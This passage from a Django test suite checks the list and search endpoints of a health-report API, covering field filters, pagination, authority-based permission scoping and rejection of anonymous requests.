factory.create_group_report_type(group=group_r, report_type=newtype)
report = factory.create_report(created_by=self.taeyeon, type=newtype,
administration_area=self.area2)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-list'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
def test_api_report_with_form_data(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
'withFormData': True
}
response = self.client.get(reverse('report-list'), params)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
self.assertEqual(report1['formData'], json.loads(self.report2.form_data))
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
self.assertEqual(report2['formData'], json.loads(self.report3.form_data))
report3 = response_json['results'][2]
self.assertEqual(report3['id'], self.report1.id)
self.assertEqual(report3['formData'], json.loads(self.report1.form_data))
def test_api_report_with_form_data_and_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
params = {
'withFormData': True
}
response = self.client.get(reverse('report-list'), params)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
self.assertEqual(report1['formData'], json.loads(self.report2.form_data))
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
self.assertEqual(report2['formData'], json.loads(self.report3.form_data))
report3 = response_json['results'][2]
self.assertEqual(report3['id'], self.report1.id)
self.assertEqual(report3['formData'], json.loads(self.report1.form_data))
'''
def test_api_report_list_will_return_report_that_area_is_child_of_permitted_administration_area(self):
area = self.area1.add_child(name='Namsan', location=self.area1.location)
report = factory.create_report(type=self.type1, administration_area=area,
date=datetime.datetime(2014, 10, 9, 13, 30, 45))
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-list'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 4)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
report3 = response_json['results'][2]
self.assertEqual(report3['id'], self.report1.id)
report4 = response_json['results'][3]
self.assertEqual(report4['id'], report.id)
def test_api_report_list_will_return_report_that_area_is_child_of_permitted_administration_area_with_authority(self):
area = self.area1.add_child(name='Namsan', location=self.area1.location)
report = factory.create_report(type=self.type1, administration_area=area,
date=datetime.datetime(2014, 10, 9, 13, 30, 45))
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('report-list'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 4)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
report3 = response_json['results'][2]
self.assertEqual(report3['id'], self.report1.id)
report4 = response_json['results'][3]
self.assertEqual(report4['id'], report.id)
'''
def test_api_report_filter_by_user(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-list'), {
'createdBy': self.taeyeon.id
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 2)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report1.id)
def test_api_report_filter_by_user_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('report-list'), {
'createdBy': self.taeyeon.id
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 2)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report1.id)
def test_api_report_filter_by_report_type(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-list'), {
'type': self.type2.id
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report1.id)
def test_api_report_filter_by_report_type_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('report-list'), {
'type': self.type2.id
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report1.id)
def test_api_report_filter_by_administration_area(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-list'), {
'administrationArea': self.area1.id
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
def test_api_report_filter_by_administration_area_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('report-list'), {
'administrationArea': self.area1.id
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
def test_api_report_filter_by_form_data(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-list'), {
'symptom': u'ปวดหัว'
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report1.id)
response = self.client.get(reverse('report-list'), {
'symptom': 'fever'
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 2)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
def test_api_report_filter_by_form_data_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('report-list'), {
'symptom': u'ปวดหัว'
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report1.id)
response = self.client.get(reverse('report-list'), {
'symptom': 'fever'
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 2)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
def test_api_report_filter_multiple_value_in_one_field(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-list'), {
'symptom__in': [u'ปวดหัว', 'fever'],
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
report3 = response_json['results'][2]
self.assertEqual(report3['id'], self.report1.id)
def test_api_report_filter_multiple_value_in_one_field_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('report-list'), {
'symptom__in': [u'ปวดหัว', 'fever'],
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
report3 = response_json['results'][2]
self.assertEqual(report3['id'], self.report1.id)
def test_api_report_filter_multiple_value_in_one_field_part_2(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-list') + u'?symptom__in=stiff&symptom__in=fever')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
report3 = response_json['results'][2]
self.assertEqual(report3['id'], self.report1.id)
def test_api_report_filter_multiple_value_in_one_field_part_2_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('report-list') + u'?symptom__in=stiff&symptom__in=fever')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
report3 = response_json['results'][2]
self.assertEqual(report3['id'], self.report1.id)
def test_api_report_filter_greater_than_value(self):
    """sickCount__gt filters numerically on form data values."""
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
    resp = self.client.get(reverse('report-list'), {'sickCount__gt': 4})
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.content)
    self.assertEqual(body['count'], 1)
    self.assertEqual(body['results'][0]['id'], self.report1.id)
def test_api_report_filter_greater_than_value_with_authority(self):
    """sickCount__gt gives the same result for another member of the same authority."""
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.yoona.auth_token.key)
    resp = self.client.get(reverse('report-list'), {'sickCount__gt': 4})
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.content)
    self.assertEqual(body['count'], 1)
    self.assertEqual(body['results'][0]['id'], self.report1.id)
def test_api_report_filter_multiple_data(self):
    """Combining several filter params ANDs them together, narrowing to one report."""
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
    filters = {
        'symptom': 'fever',
        'createdBy': self.taeyeon.id,
        'type': self.type1.id,
        'administrationArea': self.area1.id,
    }
    resp = self.client.get(reverse('report-list'), filters)
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.content)
    self.assertEqual(body['count'], 1)
    self.assertEqual(body['results'][0]['id'], self.report2.id)
def test_api_report_filter_multiple_data_with_authority(self):
    """Combined filters behave identically for another member of the same authority."""
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.yoona.auth_token.key)
    filters = {
        'symptom': 'fever',
        'createdBy': self.taeyeon.id,
        'type': self.type1.id,
        'administrationArea': self.area1.id,
    }
    resp = self.client.get(reverse('report-list'), filters)
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.content)
    self.assertEqual(body['count'], 1)
    self.assertEqual(body['results'][0]['id'], self.report2.id)
def test_api_report_filter_results_only_have_permission_on_report_type(self):
    """Filtering by a report type owned by another authority returns nothing."""
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
    resp = self.client.get(reverse('report-list'), {'type': self.type3.id})
    self.assertEqual(resp.status_code, 200)
    self.assertEqual(json.loads(resp.content)['count'], 0)
def test_api_report_filter_results_only_have_permission_on_report_type_with_authority(self):
    """A second member of the authority also gets no results for a foreign report type."""
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.yoona.auth_token.key)
    resp = self.client.get(reverse('report-list'), {'type': self.type3.id})
    self.assertEqual(resp.status_code, 200)
    self.assertEqual(json.loads(resp.content)['count'], 0)
def test_api_report_filter_results_only_have_permission_on_administration_area(self):
    """Filtering by an administration area of another authority returns nothing."""
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
    resp = self.client.get(reverse('report-list'), {'administrationArea': self.area3.id})
    self.assertEqual(resp.status_code, 200)
    self.assertEqual(json.loads(resp.content)['count'], 0)
def test_api_report_filter_results_only_have_permission_on_administration_area_with_authority(self):
    """A second member of the authority also gets no results for a foreign area."""
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.yoona.auth_token.key)
    resp = self.client.get(reverse('report-list'), {'administrationArea': self.area3.id})
    self.assertEqual(resp.status_code, 200)
    self.assertEqual(json.loads(resp.content)['count'], 0)
# NOTE(review): the two tests below are deliberately disabled by wrapping them in a
# bare triple-quoted string. They reference `self.default_positive_type`, which this
# class's setUp does not define — presumably the reason they were switched off.
# Confirm the fixture before re-enabling.
'''
def test_api_report_list_will_always_return_report_type_0(self):
factory.create_report(type=self.default_positive_type, administration_area=self.area1, negative=False)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-list'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 4)
def test_api_report_list_will_always_return_report_type_0_with_authority(self):
factory.create_report(type=self.default_positive_type, administration_area=self.area1, negative=False)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('report-list'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 4)
'''
def test_anonymous_cannot_access_api_list_reports(self):
    """Unauthenticated requests to the report list are rejected with HTTP 401."""
    resp = self.client.get(reverse('report-list'))
    self.assertEqual(resp.status_code, 401)
@patch('django_redis.get_redis_connection', mock_strict_redis_client)
class TestApiReportSearch(APITestCase):
def setUp(self):
    """Build users, authorities, report types, areas and indexed sample reports."""
    # The search API relies on the built-in "positive" report type (id=0) existing.
    try:
        ReportType.objects.get(id=0)
    except ReportType.DoesNotExist:
        ReportType.objects.create(
            id=0,
            name='Positive Report Type',
            form_definition='{}',
            version=0,
        )
    # Reset the search index so only this test's reports are indexed.
    call_command('clear_index', interactive=False, verbosity=0)
    # Three users: taeyeon and yoona share one authority, jessica has her own.
    for attr, last_name in (('taeyeon', 'Kim'), ('jessica', 'Jung'), ('yoona', 'Im')):
        user = factory.create_user()
        user.last_name = last_name
        user.save()
        setattr(self, attr, user)
    self.authority = factory.create_authority()
    self.authority.users.add(self.taeyeon)
    self.authority.users.add(self.yoona)
    self.authority_1 = factory.create_authority()
    self.authority_1.users.add(self.jessica)
    self.type1 = factory.create_report_type(authority=self.authority)
    self.type2 = factory.create_report_type(authority=self.authority)
    self.type3 = factory.create_report_type(authority=self.authority_1)
    self.area1 = factory.create_administration_area(authority=self.authority)
    self.area2 = factory.create_administration_area(authority=self.authority)
    self.area3 = factory.create_administration_area(authority=self.authority_1)
    # Reports 1-3 are visible to self.authority; 4 and 5 use a foreign type/area.
    self.report1 = factory.create_report(
        created_by=self.taeyeon, type=self.type2, administration_area=self.area2,
        form_data={
            "symptom": u"cough,ปวดหัว,stiff",
            "sickCount": 5,
        },
        date=datetime.datetime(2014, 11, 7, 12, 30, 45))
    self.report2 = factory.create_report(
        created_by=self.taeyeon, type=self.type1, administration_area=self.area1,
        date=datetime.datetime(2014, 11, 11, 12, 30, 45))
    self.report3 = factory.create_report(
        created_by=self.jessica, type=self.type1, administration_area=self.area2,
        date=datetime.datetime(2014, 11, 9, 13, 30, 45))
    self.report4 = factory.create_report(type=self.type3, administration_area=self.area2)
    self.report5 = factory.create_report(type=self.type1, administration_area=self.area3)
def test_api_report_search(self):
    """Search lists the caller's three visible reports with their summary fields."""
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
    resp = self.client.get(reverse('reports_search'))
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.content)
    self.assertEqual(body['count'], 3)
    # Results come back in this order: report2, report3, report1.
    expected = [self.report2, self.report3, self.report1]
    for item, report in zip(body['results'], expected):
        self.assertEqual(item['id'], report.id)
        self.assertEqual(item['reportId'], report.report_id)
        self.assertEqual(item['guid'], report.guid)
        self.assertEqual(item['reportTypeId'], report.type.id)
        self.assertEqual(item['administrationAreaId'], report.administration_area.id)
        self.assertEqual(item['negative'], report.negative)
        self.assertEqual(item['createdByName'], report.created_by.get_full_name())
        self.assertEqual(item['date'], report.date.strftime('%Y-%m-%dT%H:%M:%SZ'))
        self.assertEqual(item['incidentDate'], report.incident_date.strftime('%Y-%m-%d'))
def test_api_report_search_with_authority(self):
    """A second member of the same authority sees identical search results."""
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.yoona.auth_token.key)
    resp = self.client.get(reverse('reports_search'))
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.content)
    self.assertEqual(body['count'], 3)
    # Results come back in this order: report2, report3, report1.
    expected = [self.report2, self.report3, self.report1]
    for item, report in zip(body['results'], expected):
        self.assertEqual(item['id'], report.id)
        self.assertEqual(item['reportId'], report.report_id)
        self.assertEqual(item['guid'], report.guid)
        self.assertEqual(item['reportTypeId'], report.type.id)
        self.assertEqual(item['administrationAreaId'], report.administration_area.id)
        self.assertEqual(item['negative'], report.negative)
        self.assertEqual(item['createdByName'], report.created_by.get_full_name())
        self.assertEqual(item['date'], report.date.strftime('%Y-%m-%dT%H:%M:%SZ'))
        self.assertEqual(item['incidentDate'], report.incident_date.strftime('%Y-%m-%d'))
def test_api_report_search_with_pagination(self):
    """page_size/page split the 3 results into pages of 2 and then 1."""
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
    for query, expected_len in (({'page_size': 2}, 2),
                                ({'page_size': 2, 'page': 2}, 1)):
        resp = self.client.get(reverse('reports_search'), query)
        self.assertEqual(resp.status_code, 200)
        body = json.loads(resp.content)
        # Total count is unaffected by pagination; only the page length changes.
        self.assertEqual(body['count'], 3)
        self.assertEqual(len(body['results']), expected_len)
def test_api_report_search_with_pagination_with_authority(self):
    """Pagination behaves identically for another member of the same authority."""
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.yoona.auth_token.key)
    for query, expected_len in (({'page_size': 2}, 2),
                                ({'page_size': 2, 'page': 2}, 1)):
        resp = self.client.get(reverse('reports_search'), query)
        self.assertEqual(resp.status_code, 200)
        body = json.loads(resp.content)
        self.assertEqual(body['count'], 3)
        self.assertEqual(len(body['results']), expected_len)
def test_api_report_search_filter_date_lt(self):
    """date__lt keeps only reports dated strictly before the given timestamp."""
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
    resp = self.client.get(reverse('reports_search'),
                           {'date__lt': '2014-11-11T12:30:45Z'})
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.content)
    self.assertEqual(body['count'], 2)
    self.assertEqual(len(body['results']), 2)
    self.assertEqual([item['id'] for item in body['results']],
                     [self.report3.id, self.report1.id])
def test_api_report_search_filter_date_lt_with_authority(self):
    """date__lt gives the same results for another member of the same authority."""
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.yoona.auth_token.key)
    resp = self.client.get(reverse('reports_search'),
                           {'date__lt': '2014-11-11T12:30:45Z'})
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.content)
    self.assertEqual(body['count'], 2)
    self.assertEqual(len(body['results']), 2)
    self.assertEqual([item['id'] for item in body['results']],
                     [self.report3.id, self.report1.id])
def test_api_report_search_return_report_only_administration_area_in_group_role_reporter(self):
    """A report in an area granted only via an alert group does not widen search results.

    The count stays at 3 — presumably the alert-report group grant does not
    confer search visibility; confirm against the view's permission logic.
    """
    alert_group = factory.add_user_to_new_group(
        user=self.taeyeon, type=GROUP_WORKING_TYPE_ALERT_REPORT_ADMINSTRATION_AREA)
    extra_area = factory.create_administration_area()
    factory.create_group_administration_area(group=alert_group,
                                             administration_area=extra_area)
    factory.create_report(created_by=self.taeyeon, type=self.type1,
                          administration_area=extra_area)
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
    resp = self.client.get(reverse('reports_search'))
    self.assertEqual(resp.status_code, 200)
    self.assertEqual(json.loads(resp.content)['count'], 3)
def test_api_report_search_return_report_only_report_type_in_group_role_reporter(self):
    """A report whose type is granted only via an alert group does not widen search results.

    The count stays at 3 — presumably the alert-report group grant does not
    confer search visibility; confirm against the view's permission logic.
    """
    alert_group = factory.add_user_to_new_group(
        user=self.taeyeon, type=GROUP_WORKING_TYPE_ALERT_REPORT_REPORT_TYPE)
    extra_type = factory.create_report_type()
    factory.create_group_report_type(group=alert_group, report_type=extra_type)
    factory.create_report(created_by=self.taeyeon, type=extra_type,
                          administration_area=self.area2)
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
    resp = self.client.get(reverse('reports_search'))
    self.assertEqual(resp.status_code, 200)
    self.assertEqual(json.loads(resp.content)['count'], 3)
def test_api_report_search_with_form_data(self):
    """withFormData=True embeds each report's parsed form data in the results."""
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
    resp = self.client.get(reverse('reports_search'), {'withFormData': True})
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.content)
    self.assertEqual(body['count'], 3)
    expected = [self.report2, self.report3, self.report1]
    for item, report in zip(body['results'], expected):
        self.assertEqual(item['id'], report.id)
        self.assertEqual(item['formData'], json.loads(report.form_data))
def test_api_report_search_with_form_data_with_authority(self):
    """withFormData=True works the same for another member of the authority."""
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.yoona.auth_token.key)
    resp = self.client.get(reverse('reports_search'), {'withFormData': True})
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.content)
    self.assertEqual(body['count'], 3)
    expected = [self.report2, self.report3, self.report1]
    for item, report in zip(body['results'], expected):
        self.assertEqual(item['id'], report.id)
        self.assertEqual(item['formData'], json.loads(report.form_data))
# NOTE(review): the two tests below are deliberately disabled by wrapping them in a
# bare triple-quoted string. They exercise visibility of reports in child
# administration areas (`add_child`); confirm why they were disabled before
# re-enabling.
'''
def test_api_report_search_will_return_report_that_area_is_child_of_permitted_administration_area(self):
area = self.area1.add_child(name='Namsan', location=self.area1.location)
report = factory.create_report(type=self.type1, administration_area=area,
date=datetime.datetime(2014, 10, 9, 13, 30, 45))
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 4)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
report3 = response_json['results'][2]
self.assertEqual(report3['id'], self.report1.id)
report4 = response_json['results'][3]
self.assertEqual(report4['id'], report.id)
def test_api_report_search_will_return_report_that_area_is_child_of_permitted_administration_area_with_authority(self):
area = self.area1.add_child(name='Namsan', location=self.area1.location)
report = factory.create_report(type=self.type1, administration_area=area,
date=datetime.datetime(2014, 10, 9, 13, 30, 45))
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 4)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
report3 = response_json['results'][2]
self.assertEqual(report3['id'], self.report1.id)
report4 = response_json['results'][3]
self.assertEqual(report4['id'], report.id)
'''
def test_api_report_search_by_user(self):
    """q=createdBy:<id> restricts search results to that creator's reports."""
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
    resp = self.client.get(reverse('reports_search'),
                           {'q': 'createdBy:%s' % self.taeyeon.id})
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.content)
    self.assertEqual(body['count'], 2)
    self.assertEqual([item['id'] for item in body['results']],
                     [self.report2.id, self.report1.id])
def test_api_report_search_by_report_type(self):
    """q=type:<id> restricts search results to reports of that type."""
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
    resp = self.client.get(reverse('reports_search'),
                           {'q': 'type:%s' % self.type2.id})
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.content)
    self.assertEqual(body['count'], 1)
    self.assertEqual(body['results'][0]['id'], self.report1.id)
def test_api_report_search_by_administration_area(self):
    """q=administrationArea:<id> restricts search results to that area."""
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
    resp = self.client.get(reverse('reports_search'),
                           {'q': 'administrationArea:%s' % self.area1.id})
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.content)
    self.assertEqual(body['count'], 1)
    self.assertEqual(body['results'][0]['id'], self.report2.id)
def test_api_report_search_by_form_data(self):
    """field:value queries match against values stored in report form data."""
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
    # A Thai-language symptom appears only in report1's form data.
    resp = self.client.get(reverse('reports_search'), {'q': u'symptom:ปวดหัว'})
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.content)
    self.assertEqual(body['count'], 1)
    self.assertEqual(body['results'][0]['id'], self.report1.id)
    # "fever" matches the default form data of reports 2 and 3.
    resp = self.client.get(reverse('reports_search'), {'q': 'symptom:fever'})
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.content)
    self.assertEqual(body['count'], 2)
    self.assertEqual([item['id'] for item in body['results']],
                     [self.report2.id, self.report3.id])
def test_api_report_search_by_form_data_with_authority(self):
    """Form-data queries work identically for another member of the authority."""
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.yoona.auth_token.key)
    resp = self.client.get(reverse('reports_search'), {'q': u'symptom:ปวดหัว'})
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.content)
    self.assertEqual(body['count'], 1)
    self.assertEqual(body['results'][0]['id'], self.report1.id)
    resp = self.client.get(reverse('reports_search'), {'q': 'symptom:fever'})
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.content)
    self.assertEqual(body['count'], 2)
    self.assertEqual([item['id'] for item in body['results']],
                     [self.report2.id, self.report3.id])
def test_api_report_search_multiple_value_in_one_field(self):
    """An OR query over one field returns the union of matching reports."""
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
    resp = self.client.get(reverse('reports_search'),
                           {'q': u'symptom:ปวดหัว OR symptom:fever'})
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.content)
    self.assertEqual(body['count'], 3)
    self.assertEqual([item['id'] for item in body['results']],
                     [self.report2.id, self.report3.id, self.report1.id])
def test_api_report_search_multiple_value_in_one_field_with_authority(self):
    """The OR query works identically for another member of the authority."""
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.yoona.auth_token.key)
    resp = self.client.get(reverse('reports_search'),
                           {'q': u'symptom:ปวดหัว OR symptom:fever'})
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.content)
    self.assertEqual(body['count'], 3)
    self.assertEqual([item['id'] for item in body['results']],
                     [self.report2.id, self.report3.id, self.report1.id])
def test_api_report_search_greater_than_value(self):
    """A range query (sickCount:[5 TO *]) matches numeric form data values."""
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
    resp = self.client.get(reverse('reports_search'), {'q': 'sickCount:[5 TO *]'})
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.content)
    self.assertEqual(body['count'], 1)
    self.assertEqual(body['results'][0]['id'], self.report1.id)
def test_api_report_search_greater_than_value_with_authority(self):
    """The range query works identically for another member of the authority."""
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.yoona.auth_token.key)
    resp = self.client.get(reverse('reports_search'), {'q': 'sickCount:[5 TO *]'})
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.content)
    self.assertEqual(body['count'], 1)
    self.assertEqual(body['results'][0]['id'], self.report1.id)
def test_api_report_search_multiple_data(self):
    """ANDing several field queries narrows the search to a single report."""
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
    query = 'symptom:fever AND createdBy:%s AND type:%s AND administrationArea:%s' % (
        self.taeyeon.id,
        self.type1.id,
        self.area1.id,
    )
    resp = self.client.get(reverse('reports_search') + '?q=' + query)
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.content)
    self.assertEqual(body['count'], 1)
    self.assertEqual(body['results'][0]['id'], self.report2.id)
def test_api_report_search_multiple_data_with_authority(self):
    """The ANDed query works identically for another member of the authority."""
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.yoona.auth_token.key)
    query = 'symptom:fever AND createdBy:%s AND type:%s AND administrationArea:%s' % (
        self.taeyeon.id,
        self.type1.id,
        self.area1.id,
    )
    resp = self.client.get(reverse('reports_search') + '?q=' + query)
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.content)
    self.assertEqual(body['count'], 1)
    self.assertEqual(body['results'][0]['id'], self.report2.id)
def test_api_report_search_results_only_have_permission_on_report_type(self):
    """Searching by a report type owned by another authority yields no results."""
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
    resp = self.client.get(reverse('reports_search'),
                           {'q': 'type:%s' % self.type3.id})
    self.assertEqual(resp.status_code, 200)
    self.assertEqual(json.loads(resp.content)['count'], 0)
# NOTE(review): method name is missing the trailing "y" ("authorit"); kept as-is
# to preserve the existing test id.
def test_api_report_search_results_only_have_permission_on_report_type_with_authorit(self):
    """A second member of the authority also gets no results for a foreign type."""
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.yoona.auth_token.key)
    resp = self.client.get(reverse('reports_search'),
                           {'q': 'type:%s' % self.type3.id})
